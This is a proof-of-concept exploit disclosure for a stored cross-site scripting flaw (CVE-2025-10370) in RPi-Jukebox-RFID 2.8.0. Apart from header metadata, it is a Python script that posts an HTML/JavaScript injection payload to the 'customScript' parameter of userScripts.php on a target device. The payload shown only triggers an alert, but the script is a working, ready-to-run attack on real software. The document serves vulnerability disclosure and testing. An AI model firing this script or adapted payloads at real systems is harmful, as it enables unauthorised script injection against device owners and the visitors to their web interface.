RPi-Jukebox-RFID 2.8.0 – Stored Cross-Site Scripting (XSS)
Proof of Concept (PoC)
poc.py
# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370)
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
# Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
# Version: 2.8.0
# Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
# CVE: CVE-2025-10370
#
# Description:
# This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page.
# The vulnerable parameter "customScript" does not sanitize input correctly, allowing injection
# of arbitrary JavaScript payloads.
import requests
# Change this to the actual IP or hostname of the target device
TARGET = "http://YOUR-TARGET-IP/phoniebox/htdocs/userScripts.php"
# The XSS payload
PAYLOAD = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>'
# HTTP headers
headers = {
"User-Agent": "Mozilla/5.0",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": TARGET,
}
# POST data with the malicious payload
data = {
"customScript": PAYLOAD
}
def send_exploit():
print(f"[+] Sending XSS payload to {TARGET}")
try:
r = requests.post(TARGET, headers=headers, data=data, timeout=5)
print(f"[+] Payload sent. Status code: {r.status_code}")
print("[*] If the target is vulnerable, the payload will execute when the page is rendered.")
except Exception as e:
print(f"[-] Exploit failed: {e}")
if __name__ == "__main__":
send_exploit()